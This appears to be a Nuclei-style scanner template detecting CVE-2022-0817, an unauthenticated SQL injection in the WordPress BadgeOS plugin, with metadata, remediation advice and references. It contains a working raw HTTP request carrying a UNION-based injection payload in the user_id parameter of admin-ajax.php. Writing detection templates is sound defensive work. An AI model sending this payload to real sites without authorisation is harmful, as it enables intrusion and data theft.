50 lines
2.0 KiB
YAML
50 lines
2.0 KiB
YAML
id: CVE-2022-0817
|
|
|
|
info:
|
|
name: WordPress BadgeOS <=3.7.0 - SQL Injection
|
|
author: theamanrawat
|
|
severity: critical
|
|
description: |
|
|
WordPress BadgeOS plugin through 3.7.0 contains a SQL injection vulnerability. It does not sanitize and escape a parameter before using it in a SQL statement via an AJAX action. An attacker can possibly obtain sensitive information, modify data, and/or execute unauthorized administrative operations in the context of the affected site.
|
|
remediation: |
|
|
Update to the latest version of the BadgeOS plugin (>=3.7.1) to mitigate this vulnerability.
|
|
reference:
|
|
- https://wpscan.com/vulnerability/69263610-f454-4f27-80af-be523d25659e
|
|
- https://wordpress.org/plugins/badgeos/
|
|
- https://nvd.nist.gov/vuln/detail/CVE-2022-0817
|
|
classification:
|
|
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
|
|
cvss-score: 9.8
|
|
cve-id: CVE-2022-0817
|
|
cwe-id: CWE-89
|
|
epss-score: 0.03202
|
|
epss-percentile: 0.90143
|
|
cpe: cpe:2.3:a:badgeos:badgeos:*:*:*:*:*:wordpress:*:*
|
|
metadata:
|
|
verified: true
|
|
max-request: 1
|
|
vendor: badgeos
|
|
product: badgeos
|
|
framework: wordpress
|
|
tags: cve2022,wp,unauth,sqli,cve,wp-plugin,badgeos,wpscan,wordpress
|
|
variables:
|
|
num: "999999999"
|
|
|
|
http:
|
|
- raw:
|
|
- |
|
|
POST /wp-admin/admin-ajax.php HTTP/1.1
|
|
Host: {{Hostname}}
|
|
Content-Type: application/x-www-form-urlencoded
|
|
|
|
action=get-achievements&total_only=true&user_id=11 UNION ALL SELECT NULL,CONCAT(1,md5({{num}}),1),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- -
|
|
|
|
matchers:
|
|
- type: dsl
|
|
dsl:
|
|
- 'status_code == 200'
|
|
- "contains(body, md5(num))"
|
|
- 'contains(content_type, "application/json")'
|
|
- 'contains(body, "badgeos-arrange-buttons")'
|
|
condition: and
|
|
# digest: 4a0a0047304502205861884e5bb46937370b145adba175b86d44331f5bfa94d299c1aa8a82bf1265022100cc155bf1968d6eb2a64454e4ec8555e8faac33c42c793390ea13eca5171029f0:922c64590222798bb761d5b6d8e72950 |